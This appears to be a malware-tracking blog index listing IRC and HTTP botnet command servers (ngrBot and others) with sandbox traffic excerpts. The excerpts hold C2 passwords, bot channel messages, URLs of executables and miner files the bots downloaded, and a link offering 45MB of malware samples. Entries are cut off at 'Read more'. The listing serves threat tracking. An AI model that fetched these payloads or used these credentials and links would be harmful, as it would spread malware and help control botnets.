g0ds.no-ip.biz DNS_TYPE_A 71.210.115.55 71.210.115.55:3086 Data sent: 2a5c 534e 4557 2a2f 327c 7c2a 7c7c 4d51 *SNEW*/2||*||MQ 3d3d 7c7c 2a7c 7c51 5651 3d7c 7c2a 7c7c ==||*||QVQ=||*|| 4e43 3479 7c7c 2a7c 7c57 4641 6765 4467 NC4y||*||WFAgeDg 327c 7c2a 7c7c 5157 5274 6157 3570 6333 2||*||QWRtaW5pc3 5279 5958 5276 6367 3d3d 7c7c 2a7c 7c51 RyYXRvcg==||*||Q 5656 5553 4578 5051Read more...
212.7.214.59(http malware hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
This malware take commands from web interface here:http://212.7.214.59/web/getcommand.php u can list files here: http://212.7.214.59/web/ The data identified by the following URLs was then requested from the remote web server: http://212.7.214.59/web/getcommand.php?getcmd=1 http://212.7.214.59/web/report.php?p=26319&n=1 exe file here: http://adf.ly/38d3H
69.65.19.116(irc botnet hosted in United States Gigenet)
Remote Host Port Number 69.65.19.116 8888 NICK dsvjrs USER bwwfp “” “lol” :bwwfp hosting infos: http://whois.domaintools.com/69.65.19.116
212.7.214.129(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 212.7.214.129 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}qtivayn USER qtivayn 0 0 :qtivayn JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “2” PRIVMSG #!hot! :[HTTP]: Updated HTTPRead more...
219.67.121.174(irc botnet hosted in Japan Tokyo Open Data Network(japan Telecom Co. Ltd.))
Remote Host Port Number 174.121.14.164 80 174.123.175.227 80 174.36.56.185 80 195.210.28.38 80 195.250.147.177 80 209.17.73.32 80 209.17.74.144 80 216.137.43.176 80 216.137.43.215 80 216.137.43.83 80 219.67.121.174 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]175415 USER 8307 “” “TsGh” :8307 PRIVMSG #!N!# :http://marijana1x2.bloger.hr Has Been Visited! JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! exe file: http://iphone-start.org/FaceSexy.exe hosting infos:Read more...
batebate.info(50k ngrBot hosted in United States Herndon Road Runner Holdco Llc)
Domains used to control bots: bonusrata.info 67.228.81.181 serverdns091.info 64.31.42.106 batebate.info 74.62.155.1 Remote Host Port Number 199.15.234.7 80 74.62.152.164 6969 PASS s3cr3t 68.178.232.100 6161 PASS s3cr3t Remote Host Port Number 199.15.234.7 80 94.231.108.37 80 74.62.155.136 6969 PASS ngrBot 67.228.81.181 6969 PASS ngrBot 64.31.42.106 6969 PASS ngrBot NICK n{US|XPa}wpypkul USER wpypkul 0 0 :wpypkul JOIN #nava s3cr3tRead more...
201.218.0.157(irc botnet hosted in Ecuador Quito Telconet S.a)
Remote Host Port Number 174.121.14.164 80 174.36.4.145 80 195.210.28.38 80 195.250.147.177 80 209.17.74.144 80 64.37.52.189 80 66.115.184.87 80 69.46.36.6 80 74.120.148.2 80 83.139.126.203 80 201.218.0.157 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]606170 USER 4514 “” “TsGh” :4514 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! hosting infos: http://whois.domaintools.com/201.218.0.157
216.172.132.132(ngrBot hosted in United States San Jose Serveryou.com – Oow)
Remote Host Port Number 199.101.133.30 80 199.15.234.7 80 70.38.98.238 80 216.172.132.132 1888 PASS ngrBot * The data identified by the following URLs was then requested from the remote web server: o http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe o http://api.wipmania.com/ o http://img104.herosh.com/2011/10/05/270463603.gif PRIVMSG #XP :[d=”http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe” – Download retries: 0 PRIVMSG #XP :[d=”http://img104.herosh.com/2011/10/05/270463603.gif”Read more...
45mb malware samples
This package contains around 45mb malware samples (banking trojans,irc bots,rootkis etc) Download: http://adf.ly/33Qdi
50.58.99.143(irc botnet hosted in United States Columbus Tw Telecom Holdings Inc)
Remote Host Port Number 46.17.97.83 80 46.17.97.85 80 50.58.99.143 3301 * The data identified by the following URLs was then requested from the remote web server: o http://46.17.97.83/miner/mscoree.dll o http://46.17.97.83/miner/openldap.dll o http://46.17.97.83/miner/phoenix.exe o http://46.17.97.85/miner/filelist.txt o http://46.17.97.85/miner/license.txt o http://46.17.97.85/miner/curllib.dll o http://46.17.97.85/miner/gpl-2.0.txt o http://46.17.97.85/miner/hstart.exe o http://46.17.97.85/miner/libeay32.dll o http://46.17.97.85/miner/libsasl.dll NICK [USA-XP-x86]14651 USER unreal 8 * :unreal JOIN #boatsRead more...